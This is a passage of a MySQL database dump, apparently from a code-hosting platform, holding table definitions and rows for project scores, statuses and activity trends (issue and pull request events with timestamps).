16:35:36','2019-03-25 11:02:44',1,0,0,0,16,0,0,0,'2019-03-25 11:01:43',0),(120,'127',0,'2019-03-22 16:06:15','2020-02-01 22:48:59',0,0,0,0,2,0,0,0,'2019-03-22 16:12:40',0),(122,'129',0,'2019-03-28 10:48:42','2020-02-01 22:27:45',0,0,0,0,20,0,0,0,'2019-10-29 22:31:32',0),(123,'130',0,'2019-04-01 11:23:26','2019-10-21 16:42:41',7,22,0,0,12,0,0,0,'2019-10-21 16:35:44',0),(124,'131',0,'2019-04-28 10:06:35','2019-04-28 10:06:37',0,0,0,0,0,0,0,0,NULL,0),(125,'132',0,'2019-08-07 15:10:24','2019-08-07 15:10:24',0,0,0,0,0,0,0,0,NULL,0),(130,'137',0,'2019-08-16 08:09:19','2019-08-16 08:09:44',0,0,0,0,0,0,0,0,'2018-06-08 19:18:15',0),(132,'139',0,'2019-08-16 08:14:52','2019-11-21 14:34:52',0,0,0,0,1617,0,0,0,'2019-07-04 05:20:38',0),(133,'140',0,'2019-08-16 08:19:16','2019-08-16 08:19:49',0,0,0,0,16,0,0,0,'2016-03-24 11:07:34',0),(134,'141',0,'2019-08-16 08:23:47','2019-09-02 08:56:25',2,2,0,0,1324,0,0,0,'2016-08-26 18:16:22',0),(136,'143',0,'2019-08-16 08:31:32','2019-08-16 08:31:32',0,0,0,0,NULL,0,0,0,NULL,0),(137,'144',0,'2019-08-16 09:31:38','2019-10-18 09:50:52',1,0,0,0,20,0,0,0,'2019-08-15 01:05:23',0),(144,'156',0,'2019-09-29 09:10:34','2019-09-29 09:10:34',0,0,0,0,0,0,0,0,NULL,0),(145,'157',0,'2019-09-30 11:15:21','2019-09-30 11:17:23',0,0,0,0,0,0,0,0,'2019-08-27 10:05:55',0),(146,'158',0,'2019-09-30 11:36:41','2019-11-11 11:03:40',0,0,0,0,115,0,0,0,'2018-08-30 16:24:55',0),(147,'159',0,'2019-09-30 12:14:24','2019-10-09 14:05:31',0,0,0,0,123,0,0,0,'2019-03-31 20:47:38',0),(157,'169',0,'2019-10-23 15:20:39','2019-10-23 16:54:49',2,4,0,0,5,0,0,0,'2019-10-23 15:59:19',2),(166,'178',0,'2019-10-29 15:25:32','2019-10-29 15:26:08',0,0,0,0,521,0,0,0,'2019-05-24 15:13:31',1),(187,'199',0,'2019-11-07 15:51:07','2019-11-22 10:30:35',29,55,0,0,20,0,0,0,'2019-11-18 11:10:28',17),(188,'200',0,'2019-11-07 16:17:51','2019-11-07 16:18:21',0,0,0,0,1,0,0,0,'2019-11-07 15:56:57',0),(191,'203',0,'2019-11-11 09:01:30','2019-11-11 09:19:11',0,0,0,0,1,0,0,0,'2019-11-11 09:19:01',1),(192,'204',0,'2019-11-11 09:19:45','2019-11-11 09:19:45',0,0,0,0,0,0,0,0,NULL,0),(193,'205',0,'2019-11-11 09:21:19','2019-11-11 09:21:19',0,0,0,0,0,0,0,0,NULL,0),(206,'219',0,'2019-11-11 10:47:56','2019-11-11 10:48:05',0,0,0,0,2,0,0,0,'2019-11-11 10:48:05',0),(208,'221',0,'2019-11-11 10:51:19','2019-11-11 10:51:22',0,0,0,0,20,0,0,0,'2019-11-05 15:51:12',0),(210,'223',0,'2019-11-11 11:04:32','2019-11-11 11:05:03',0,0,0,0,20,0,0,0,'2019-06-03 18:52:53',0),(211,'224',0,'2019-11-11 11:38:58','2019-11-11 11:39:20',0,0,0,0,12,0,0,0,'2019-11-11 11:30:20',0),(212,'225',0,'2019-11-11 11:44:39','2019-11-11 11:44:40',0,0,0,0,0,0,0,0,NULL,0),(213,'226',0,'2019-11-11 12:34:37','2019-11-21 14:35:21',0,0,0,0,12,0,0,0,'2019-11-11 11:30:20',0),(215,'228',0,'2019-11-11 15:36:02','2019-11-11 15:36:03',0,0,0,0,0,0,0,0,NULL,0),(217,'230',0,'2019-11-11 15:37:23','2019-11-11 15:37:24',0,0,0,0,0,0,0,0,NULL,0),(218,'231',0,'2019-11-11 15:37:29','2019-11-11 15:37:29',0,0,0,0,0,0,0,0,NULL,0),(219,'232',0,'2019-11-11 17:07:52','2019-12-30 10:22:13',1,1,0,0,6,0,0,0,'2019-12-30 10:21:45',1),(220,'233',0,'2019-11-11 17:12:09','2019-11-11 17:12:19',0,0,0,0,2,0,0,0,'2019-11-11 17:11:02',0),(235,'248',0,'2019-11-22 15:41:18','2019-11-22 15:41:18',0,0,0,0,0,0,0,0,NULL,0),(237,'250',0,'2019-12-04 08:21:58','2019-12-04 08:23:32',0,0,0,0,4,0,0,0,'2019-11-11 17:15:52',0),(238,'251',0,'2020-02-01 19:03:09','2020-04-14 14:03:50',1,0,0,0,3,0,0,0,'2020-02-25 23:19:38',0),(239,'252',0,'2020-02-01 21:17:31','2020-02-03 12:19:37',0,0,0,0,0,0,0,0,NULL,0),(240,'253',0,'2020-02-01 22:24:23','2020-02-02 10:56:24',0,0,0,0,6,0,0,0,'2019-12-30 10:21:45',0),(241,'254',0,'2020-02-02 23:36:38','2020-02-03 12:16:58',0,0,0,0,2,0,0,0,'2020-02-02 23:41:57',0),(242,'255',0,'2020-02-03 12:08:29','2020-03-19 14:13:32',28,14,0,0,0,0,0,0,NULL,0),(243,'256',0,'2020-02-03 16:57:11','2020-02-09 15:25:48',0,0,0,0,5,0,0,0,'2020-02-09 15:25:33',0),(244,'257',0,'2020-02-03 17:36:28','2020-02-03 17:43:56',0,0,0,0,1,0,0,0,'2020-02-03 17:42:53',0),(245,'258',0,'2020-02-03 17:45:42','2020-02-03 17:46:53',0,0,0,0,0,0,0,0,NULL,0),(248,'261',0,'2020-02-10 12:29:43','2020-02-10 12:30:10',0,0,0,0,20,0,0,0,'2020-02-10 12:27:09',0),(249,'262',0,'2020-02-10 15:23:44','2020-02-11 09:09:46',0,0,0,0,2,0,0,0,'2020-02-11 09:09:46',0),(250,'263',0,'2020-02-10 15:26:22','2020-02-10 15:26:22',0,0,0,0,NULL,0,0,0,NULL,0),(251,'264',0,'2020-02-10 15:37:48','2020-02-10 15:37:48',0,0,0,0,NULL,0,0,0,NULL,0),(252,'265',0,'2020-02-11 09:18:25','2020-02-11 09:19:39',0,0,0,0,3,0,0,0,'2020-02-11 09:16:04',0),(253,'266',0,'2020-02-11 09:30:09','2020-02-11 09:50:49',0,0,0,0,4,0,0,0,'2020-02-11 09:45:34',0),(254,'267',0,'2020-02-11 09:39:36','2020-02-11 09:55:38',0,0,0,0,20,0,0,0,'2020-02-06 14:32:05',0),(255,'268',0,'2020-02-11 09:40:41','2020-02-11 09:41:31',0,0,0,0,20,0,0,0,'2020-01-07 07:18:02',0),(256,'269',0,'2020-02-11 09:46:46','2020-02-11 09:46:49',0,0,0,0,6,0,0,0,'2019-12-30 10:21:45',0),(257,'270',0,'2020-02-11 10:06:32','2020-02-11 10:06:32',0,0,0,0,0,0,0,0,NULL,0),(258,'272',0,'2020-03-09 10:22:41','2020-03-09 10:22:46',0,0,0,0,2,0,0,0,'2020-02-01 19:34:53',0),(259,'273',0,'2020-03-14 09:33:12','2020-03-14 09:33:12',0,0,0,0,0,0,0,0,NULL,0),(260,'274',0,'2020-03-27 19:19:54','2020-03-27 19:19:54',0,0,0,0,0,0,0,0,NULL,0),(274,'306',10436,'2015-11-03 08:27:13','2018-06-28 20:22:55',0,0,0,0,2609,0,0,1,'2015-03-21 09:28:43',0),(275,'307',8158,'2014-08-16 17:02:04','2018-06-28 17:39:08',9,0,2,20,2010,0,0,19,'2014-10-11 16:25:59',0),(276,'308',0,'2017-02-27 13:58:01','2020-07-21 00:36:39',40,20,0,0,2600,0,0,5,'2020-07-20 09:41:54',0),(277,'309',0,'2017-01-19 17:16:52','2018-06-28 17:46:29',0,0,0,0,18525,0,0,0,'2017-01-18 16:54:39',0),(278,'310',0,'2019-09-16 16:11:45','2020-05-23 03:04:24',0,0,0,0,1129,0,0,0,'2020-05-22 10:42:23',0),(279,'311',0,'2017-06-03 14:52:44','2018-06-28 17:30:58',0,0,0,0,1191,0,0,0,'2017-06-03 14:55:16',0),(280,'312',0,'2019-02-18 14:21:16','2019-11-20 18:10:47',0,0,0,0,815,0,0,0,'2019-11-20 18:03:36',0),(281,'313',0,'2016-08-08 13:00:00','2019-05-27 10:53:02',0,0,0,0,1022,0,15,0,'2019-05-27 01:07:17',0),(282,'314',0,'2018-06-11 10:17:45','2018-07-04 17:36:23',0,0,0,0,507,0,0,0,'2017-10-16 13:31:28',0),(283,'315',0,'2018-12-17 10:13:48','2018-12-21 18:08:03',0,0,0,0,622,0,0,0,'2018-12-17 16:12:11',0),(284,'316',0,'2018-11-22 23:18:22','2020-07-22 01:30:31',0,0,0,0,370,0,0,0,'2018-10-10 15:39:15',0),(285,'317',0,'2018-01-11 09:41:55','2018-06-29 10:42:32',0,0,0,0,354,0,1,2,'2018-01-11 09:47:52',0),(286,'318',1371,'2014-08-18 12:50:45','2018-06-28 18:18:38',0,0,1,16,326,0,1,6,'2014-09-22 14:24:17',0),(287,'319',0,'2016-11-06 08:30:50','2018-06-28 19:37:41',22,51,0,0,285,0,0,0,'2017-05-24 18:21:25',20),(288,'320',0,'2017-06-15 10:23:25','2017-06-15 10:23:25',0,0,0,0,285,0,0,0,NULL,0),(289,'321',0,'2019-07-09 11:26:03','2019-07-09 20:26:40',0,0,0,0,278,0,0,0,'2019-07-09 18:42:50',0),(290,'322',0,'2019-10-09 09:00:16','2019-10-28 14:45:56',0,0,0,0,265,0,0,0,'2018-10-10 21:45:52',0),(291,'323',0,'2018-10-10 16:27:13','2019-09-03 20:58:09',4,3,0,0,261,0,0,0,'2019-09-03 20:44:25',0),(292,'324',0,'2016-11-06 23:20:51','2018-06-29 06:33:08',0,0,0,0,240,0,0,1,'2017-09-07 15:11:12',32),(293,'325',0,'2017-09-01 22:35:50','2018-07-04 20:19:18',4,5,0,0,216,6,3,3,'2018-06-22 08:15:10',0),(294,'326',848,'2015-09-20 18:14:30','2018-07-01 23:25:06',0,0,0,0,215,0,0,0,'2016-01-22 00:00:36',0),(295,'327',0,'2016-12-17 10:37:57','2018-06-29 06:19:47',0,0,0,0,203,0,0,0,'2016-08-31 21:59:37',0),(296,'328',0,'2018-05-18 10:42:33','2018-07-15 17:08:03',0,0,0,0,169,0,0,0,'2016-09-03 18:39:54',0),(297,'329',0,'2019-12-10 09:01:40','2020-06-02 18:21:16',0,0,0,0,150,0,0,0,'2020-06-02 18:18:06',0),(298,'330',0,'2018-09-30 19:53:19','2019-09-04 15:23:48',6,8,0,0,141,0,0,0,'2019-09-04 15:22:12',0),(299,'331',0,'2020-03-13 18:00:52','2020-04-15 12:48:19',0,0,0,0,83,0,0,0,'2020-04-15 12:46:08',0),(300,'332',0,'2019-12-03 16:34:57','2020-05-19 18:04:55',0,0,0,0,81,1,4,0,'2020-05-19 18:01:01',1),(301,'333',0,'2017-09-01 22:11:16','2018-06-30 13:04:51',6,16,0,0,95,43,8,0,'2018-06-21 13:15:43',0),(302,'334',0,'2019-08-26 10:56:52','2020-01-09 08:38:40',1,5,0,0,110,0,0,1,'2020-01-09 08:37:52',13),(303,'335',0,'2018-05-09 13:48:41','2018-06-29 10:40:45',6,18,0,0,138,0,0,0,'2018-06-20 21:01:45',0),(304,'336',0,'2017-03-04 14:04:35','2018-07-04 01:49:08',0,0,0,0,133,0,0,0,'2017-03-04 16:04:24',1),(305,'337',0,'2016-11-16 21:19:26','2020-07-22 06:12:19',0,0,0,0,81,2,6,1,'2017-01-19 22:12:03',4),(306,'338',0,'2018-05-26 19:44:24','2018-12-22 20:16:54',3,4,0,0,79,0,0,5,'2018-06-13 20:27:01',0),(307,'339',0,'2016-09-12 19:45:04','2018-06-30 07:02:27',5,5,0,0,101,0,0,0,'2017-09-06 10:12:06',9),(308,'340',0,'2018-01-22 14:53:37','2020-07-14 23:05:09',2,0,0,0,81,0,0,7,'2018-05-09 09:49:15',0),(309,'341',0,'2016-03-20 12:54:29','2018-06-29 06:07:03',3,1,0,0,100,0,0,6,'2016-06-19 23:03:12',0),(310,'342',0,'2017-04-07 23:49:02','2018-07-30 00:29:15',0,0,0,0,93,0,0,0,'2017-09-05 16:41:20',0),(311,'343',0,'2019-01-16 15:54:10','2019-01-16 15:54:17',0,0,0,0,142,0,0,0,'2018-01-11 10:05:33',0),(312,'344',0,'2017-03-07 21:16:03','2018-08-21 17:18:18',0,0,0,0,158,0,0,0,'2017-09-06 23:20:44',0),(313,'345',0,'2018-10-27 15:43:15','2019-01-22 18:09:51',0,0,0,0,84,0,0,0,'2019-01-22 18:07:24',0),(314,'346',0,'2019-10-22 20:26:08','2020-01-17 21:05:02',1,0,0,0,168,0,1,15,'2020-01-11 12:06:09',0),(315,'347',0,'2018-05-19 14:24:37','2020-07-19 12:33:15',0,0,0,0,178,0,0,0,'2017-10-06 13:36:36',0),(316,'348',0,'2015-12-13 23:42:15','2018-06-28 18:48:08',5,0,0,0,132,3,1,1,'2016-09-04 00:57:05',7),(317,'349',0,'2018-11-27 13:10:34','2020-07-22 15:28:06',26,59,0,0,185,0,0,0,'2019-01-23 17:18:57',2),(318,'350',0,'2017-11-16 18:08:07','2020-07-21 19:20:29',23,78,0,0,103,0,16,3,'2018-02-06 16:47:09',4),(319,'351',682,'2015-10-31 09:04:55','2018-06-28 17:09:40',0,0,0,0,170,0,1,0,'2015-12-16 01:15:04',0),(320,'352',364,'2014-08-16 16:31:13','2020-07-22 12:21:14',0,0,0,0,91,0,0,0,'2012-11-21 23:16:34',0),(321,'353',332,'2015-11-20 09:14:59','2018-06-28 18:31:27',2,4,0,0,80,0,0,0,'2015-12-02 15:29:36',0),(322,'354',0,'2015-12-13 23:07:01','2018-06-28 19:41:43',0,0,0,0,161,0,0,2,'2016-09-04 01:16:10',1),(323,'355',0,'2015-12-20 22:43:07','2018-06-28 23:40:39',0,0,0,0,74,0,0,0,'2016-01-15 17:01:56',0),(324,'356',0,'2018-04-14 20:36:56','2020-05-30 16:26:36',14,35,0,0,215,0,0,0,'2020-05-30 16:09:45',0),(325,'357',0,'2016-11-03 21:40:50','2018-12-22 20:06:03',5,5,0,0,77,0,0,0,'2017-01-14 18:44:56',1),(326,'358',516,'2015-10-31 09:03:33','2018-06-28 20:24:31',0,0,0,0,129,0,0,0,'2015-12-24 08:06:25',0),(327,'359',0,'2017-09-04 23:27:24','2018-07-01 16:55:04',18,34,0,0,144,3,1,2,'2018-06-21 14:41:23',0),(328,'360',0,'2018-10-10 17:03:40','2019-09-03 22:17:06',19,42,0,0,165,0,0,0,'2019-09-03 22:16:15',2),(329,'361',0,'2019-01-08 14:10:15','2019-02-04 00:28:13',0,0,0,0,126,0,0,0,'2019-01-25 16:49:42',0),(330,'362',0,'2017-03-06 07:37:03','2018-07-23 10:31:54',0,0,0,0,110,0,2,14,'2018-04-17 17:38:24',0),(331,'363',0,'2015-12-12 10:37:28','2016-01-22 22:19:24',0,0,0,0,76,0,0,0,'2015-11-20 11:11:06',0),(332,'364',0,'2018-10-10 16:14:03','2019-09-05 00:02:34',4,6,0,0,127,0,0,0,'2019-09-03 18:29:11',0),(333,'365',412,'2014-08-17 04:25:52','2018-06-28 18:11:19',14,11,9,5,75,3,5,0,'2014-09-10 10:26:44',0),(334,'366',0,'2017-07-17 19:09:24','2018-06-29 05:34:23',3,7,0,0,86,0,0,0,'2018-01-31 20:15:19',0),(335,'367',0,'2016-11-09 16:12:04','2018-06-29 23:20:08',0,0,0,0,201,0,0,0,'2016-11-09 16:18:58',0),(336,'368',0,'2017-09-04 20:15:08','2018-07-01 01:17:38',8,20,0,0,139,2,2,0,'2018-06-22 08:31:25',0),(337,'369',0,'2016-11-08 16:17:27','2020-06-04 22:28:26',0,0,0,0,135,0,0,0,'2017-01-20 00:05:53',0),(338,'370',0,'2019-12-10 10:45:35','2019-12-26 15:47:44',0,0,0,0,74,0,0,0,'2019-12-25 14:53:08',0),(339,'371',0,'2019-06-17 17:15:51','2020-07-03 05:43:16',0,0,0,0,85,0,0,0,'2020-06-29 11:18:23',0);
|
||
/*!40000 ALTER TABLE `project_scores` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_statistics`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_statistics`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_statistics` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`common_projects_count` int(11) DEFAULT '0',
|
||
`mirror_projects_count` int(11) DEFAULT '0',
|
||
`sync_mirror_projects_count` int(11) DEFAULT '0',
|
||
`commits_total_count` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_statistics`
|
||
--
|
||
|
||
LOCK TABLES `project_statistics` WRITE;
|
||
/*!40000 ALTER TABLE `project_statistics` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `project_statistics` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_statuses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_statuses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_statuses` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`changesets_count` int(11) DEFAULT NULL,
|
||
`watchers_count` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`project_type` int(11) DEFAULT NULL,
|
||
`grade` float DEFAULT '0',
|
||
`course_ac_para` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_project_statuses_on_grade` (`grade`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=24 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_statuses`
|
||
--
|
||
|
||
LOCK TABLES `project_statuses` WRITE;
|
||
/*!40000 ALTER TABLE `project_statuses` DISABLE KEYS */;
|
||
INSERT INTO `project_statuses` VALUES (3,0,0,101,NULL,0,0),(4,0,0,120,NULL,0,0),(5,0,0,158,NULL,0,0),(8,0,0,161,NULL,0,0),(9,0,0,127,NULL,0,0),(10,0,0,156,NULL,0,0),(11,0,0,178,NULL,0,0),(15,0,0,199,NULL,0,0),(18,0,0,144,NULL,0,0),(19,0,0,103,0,0,0),(20,0,0,141,NULL,0,0),(21,0,0,232,NULL,0,0),(23,0,0,251,NULL,0,0);
|
||
/*!40000 ALTER TABLE `project_statuses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_trends`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_trends`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_trends` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`trend_type` varchar(255) DEFAULT NULL,
|
||
`trend_id` bigint(20) DEFAULT NULL,
|
||
`action_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_project_trends_on_trend_type_and_trend_id` (`trend_type`,`trend_id`),
|
||
KEY `index_project_trends_on_user_id_and_project_id` (`user_id`,`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=195 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_trends`
|
||
--
|
||
|
||
LOCK TABLES `project_trends` WRITE;
|
||
/*!40000 ALTER TABLE `project_trends` DISABLE KEYS */;
|
||
INSERT INTO `project_trends` VALUES (3,46,370,'PullRequest',41,'close','2020-08-13 01:05:22','2020-08-13 01:05:22'),(4,1,376,'Issue',143,'create','2020-08-13 01:58:08','2020-08-13 01:58:08'),(5,1,376,'Issue',144,'create','2020-08-13 02:01:15','2020-08-13 02:01:15'),(6,46,376,'Issue',145,'create','2020-08-13 02:01:45','2020-08-13 02:01:45'),(7,46,376,'Issue',146,'create','2020-08-13 02:02:52','2020-08-13 02:02:52'),(8,46,376,'Issue',147,'create','2020-08-13 02:04:37','2020-08-13 02:04:37'),(9,1,376,'Issue',148,'create','2020-08-13 02:08:50','2020-08-13 02:08:50'),(10,46,376,'Issue',149,'create','2020-08-13 02:09:22','2020-08-13 02:09:22'),(11,1,376,'Issue',150,'create','2020-08-13 02:11:36','2020-08-13 02:11:36'),(12,1,376,'Issue',151,'create','2020-08-13 02:15:46','2020-08-13 02:15:46'),(13,1,376,'Issue',152,'create','2020-08-13 02:16:44','2020-08-13 02:16:44'),(14,1,376,'Issue',153,'create','2020-08-13 02:24:41','2020-08-13 02:24:41'),(17,46,370,'Issue',156,'create','2020-08-14 00:28:49','2020-08-14 00:28:49'),(19,46,376,'Issue',158,'create','2020-08-14 00:30:09','2020-08-14 00:30:09'),(20,46,376,'Issue',159,'create','2020-08-14 00:33:59','2020-08-14 00:33:59'),(21,46,376,'Issue',160,'create','2020-08-14 00:49:20','2020-08-14 00:49:20'),(22,46,376,'Issue',161,'create','2020-08-14 01:10:40','2020-08-14 01:10:40'),(23,46,376,'Issue',162,'create','2020-08-14 01:31:07','2020-08-14 01:31:07'),(24,46,376,'Issue',163,'create','2020-08-14 01:35:58','2020-08-14 01:35:58'),(25,66,370,'Issue',164,'create','2020-08-14 01:37:39','2020-08-14 01:37:39'),(26,66,370,'PullRequest',43,'close','2020-08-14 02:30:44','2020-08-14 02:30:44'),(27,46,376,'Issue',166,'create','2020-08-14 07:36:33','2020-08-14 07:36:33'),(28,46,376,'Issue',167,'create','2020-08-14 07:58:42','2020-08-14 07:58:42'),(29,46,376,'Issue',168,'create','2020-08-14 08:15:34','2020-08-14 08:15:34'),(30,1,376,'Issue',169,'create','2020-08-17 01:30:41','2020-08-17 01:30:41'),(31,1,376,'Issue',170,'create','2020-08-17 07:06:31','2020-08-17 07:06:31'),(32,1,376,'Issue',171,'create','2020-08-17 07:24:21','2020-08-17 07:24:21'),(33,1,376,'Issue',172,'create','2020-08-17 07:59:04','2020-08-17 07:59:04'),(34,1,376,'Issue',173,'create','2020-08-17 08:00:48','2020-08-17 08:00:48'),(35,1,376,'Issue',174,'create','2020-08-17 08:17:40','2020-08-17 08:17:40'),(36,1,376,'Issue',175,'create','2020-08-17 08:38:27','2020-08-17 08:38:27'),(37,1,376,'Issue',176,'create','2020-08-17 08:44:43','2020-08-17 08:44:43'),(38,47,268,'Issue',177,'create','2020-08-17 10:43:57','2020-08-17 10:43:57'),(39,1,376,'Issue',178,'create','2020-08-18 01:01:49','2020-08-18 01:01:49'),(40,1,376,'Issue',179,'create','2020-08-18 01:15:15','2020-08-18 01:15:15'),(41,1,376,'Issue',180,'create','2020-08-18 01:22:13','2020-08-18 01:22:13'),(42,1,100,'PullRequest',44,'create','2020-08-18 02:46:04','2020-08-18 02:46:04'),(43,1,268,'Issue',182,'create','2020-08-18 09:14:25','2020-08-18 09:14:25'),(45,1,376,'Issue',184,'create','2020-08-20 01:00:00','2020-08-20 01:00:00'),(46,1,376,'Issue',185,'create','2020-08-20 01:01:35','2020-08-20 01:01:35'),(47,1,376,'Issue',186,'create','2020-08-20 01:03:25','2020-08-20 01:03:25'),(48,1,376,'Issue',187,'create','2020-08-20 01:08:31','2020-08-20 01:08:31'),(49,1,376,'Issue',188,'create','2020-08-20 01:27:45','2020-08-20 01:27:45'),(50,49,376,'PullRequest',45,'close','2020-08-20 01:54:05','2020-08-20 01:54:05'),(51,47,376,'PullRequest',46,'close','2020-08-20 02:56:15','2020-08-20 02:56:15'),(52,47,268,'Issue',191,'create','2020-08-20 03:05:28','2020-08-20 03:05:28'),(54,47,376,'PullRequest',48,'create','2020-08-20 10:26:39','2020-08-20 10:26:39'),(55,1,376,'Issue',194,'create','2020-08-20 11:58:09','2020-08-20 11:58:09'),(57,1,376,'Issue',196,'create','2020-08-21 00:19:43','2020-08-21 00:19:43'),(58,1,376,'Issue',197,'create','2020-08-21 00:39:18','2020-08-21 00:39:18'),(59,1,376,'Issue',198,'create','2020-08-21 00:46:16','2020-08-21 00:46:16'),(60,1,376,'Issue',199,'create','2020-08-21 00:50:54','2020-08-21 00:50:54'),(61,1,376,'Issue',200,'create','2020-08-21 00:54:59','2020-08-21 00:54:59'),(62,1,376,'Issue',201,'create','2020-08-21 01:10:43','2020-08-21 01:10:43'),(63,1,376,'Issue',202,'create','2020-08-21 02:13:48','2020-08-21 02:13:48'),(64,1,376,'Issue',203,'create','2020-08-21 07:13:52','2020-08-21 07:13:52'),(65,46,376,'Issue',204,'create','2020-08-24 01:03:07','2020-08-24 01:03:07'),(66,46,376,'Issue',205,'create','2020-08-24 01:33:39','2020-08-24 01:33:39'),(67,46,376,'PullRequest',49,'create','2020-08-24 01:44:15','2020-08-24 01:44:15'),(68,46,376,'Issue',207,'create','2020-08-24 01:57:15','2020-08-24 01:57:15'),(69,47,376,'PullRequest',50,'create','2020-08-24 01:58:45','2020-08-24 01:58:45'),(70,47,376,'PullRequest',51,'create','2020-08-24 01:59:59','2020-08-24 01:59:59'),(71,46,376,'Issue',210,'create','2020-08-24 02:04:02','2020-08-24 02:04:02'),(72,46,376,'Issue',211,'create','2020-08-24 02:19:43','2020-08-24 02:19:43'),(73,46,376,'Issue',212,'create','2020-08-24 03:21:19','2020-08-24 03:21:19'),(74,46,376,'Issue',213,'create','2020-08-24 07:46:27','2020-08-24 07:46:27'),(75,46,376,'Issue',214,'create','2020-08-24 08:06:27','2020-08-24 08:06:27'),(76,46,376,'Issue',215,'create','2020-08-24 08:35:35','2020-08-24 08:35:35'),(77,46,376,'Issue',216,'create','2020-08-24 08:52:25','2020-08-24 08:52:25'),(78,46,376,'Issue',217,'create','2020-08-24 09:06:47','2020-08-24 09:06:47'),(79,47,376,'Issue',218,'create','2020-08-25 02:45:16','2020-08-25 02:45:16'),(80,46,376,'Issue',219,'create','2020-08-25 07:33:33','2020-08-25 07:33:33'),(81,46,376,'Issue',220,'create','2020-08-25 08:29:50','2020-08-25 08:29:50'),(82,46,376,'Issue',221,'create','2020-08-26 06:51:37','2020-08-26 06:51:37'),(83,46,376,'Issue',222,'create','2020-08-26 08:46:20','2020-08-26 08:46:20'),(84,1,392,'Issue',223,'create','2020-09-07 08:34:03','2020-09-07 08:34:03'),(85,49,397,'PullRequest',52,'close','2020-10-15 00:55:34','2020-10-15 00:55:34'),(86,46,370,'PullRequest',53,'create','2020-10-15 06:55:11','2020-10-15 06:55:11'),(87,46,370,'PullRequest',54,'create','2020-10-16 02:06:32','2020-10-16 02:06:32'),(88,46,376,'Issue',227,'create','2020-10-22 08:15:18','2020-10-22 08:15:18'),(89,46,376,'Issue',228,'create','2020-10-22 08:20:23','2020-10-22 08:20:23'),(118,155,473,'PullRequest',75,'close','2021-01-22 08:12:52','2021-01-22 08:12:52'),(119,155,473,'Issue',251,'create','2021-01-22 08:18:53','2021-01-22 08:18:53'),(120,155,473,'VersionRelease',1,'create','2021-01-22 08:25:40','2021-01-22 08:25:40'),(121,155,474,'VersionRelease',2,'create','2021-01-25 05:19:06','2021-01-25 05:19:06'),(122,155,474,'Issue',252,'create','2021-01-25 05:38:12','2021-01-25 05:38:12'),(123,155,473,'PullRequest',76,'create','2021-01-25 05:56:06','2021-01-25 05:56:06'),(124,155,474,'VersionRelease',3,'create','2021-01-25 06:43:00','2021-01-25 06:43:00'),(125,122,477,'PullRequest',77,'create','2021-01-26 02:15:42','2021-01-26 02:15:42'),(126,156,477,'Issue',255,'create','2021-01-26 09:24:05','2021-01-26 09:24:05'),(127,122,477,'PullRequest',78,'create','2021-01-28 07:09:03','2021-01-28 07:09:03'),(128,48,389,'Issue',257,'create','2021-01-28 07:27:01','2021-01-28 07:27:01'),(129,115,370,'Issue',258,'create','2021-01-28 09:07:32','2021-01-28 09:07:32'),(130,46,477,'Issue',259,'create','2021-01-28 09:15:45','2021-01-28 09:15:45'),(131,49,477,'Issue',260,'create','2021-01-28 09:25:31','2021-01-28 09:25:31'),(132,46,329,'Issue',261,'create','2021-01-28 09:46:21','2021-01-28 09:46:21'),(133,122,477,'PullRequest',79,'create','2021-02-09 09:21:04','2021-02-09 09:21:04'),(134,46,477,'Issue',263,'create','2021-02-18 01:46:59','2021-02-18 01:46:59'),(135,49,494,'Issue',264,'create','2021-02-22 08:33:51','2021-02-22 08:33:51'),(136,49,494,'Issue',265,'create','2021-02-22 08:33:56','2021-02-22 08:33:56'),(137,73,494,'PullRequest',80,'close','2021-02-22 09:07:48','2021-02-22 09:07:48'),(138,122,477,'PullRequest',81,'close','2021-02-22 11:21:06','2021-02-22 11:21:06'),(139,137,477,'PullRequest',82,'create','2021-02-22 11:28:34','2021-02-22 11:28:34'),(154,128,430,'PullRequest',NULL,'create','2021-02-25 09:43:17','2021-02-25 09:43:17'),(155,128,430,'PullRequest',NULL,'create','2021-02-25 09:43:54','2021-02-25 09:43:54'),(156,128,430,'PullRequest',84,'create','2021-02-25 10:39:42','2021-02-25 10:39:42'),(159,73,376,'Issue',273,'create','2021-03-01 08:24:29','2021-03-01 08:24:29'),(160,46,376,'Issue',274,'create','2021-03-02 07:00:27','2021-03-02 07:00:27'),(161,46,376,'Issue',275,'create','2021-03-02 07:04:46','2021-03-02 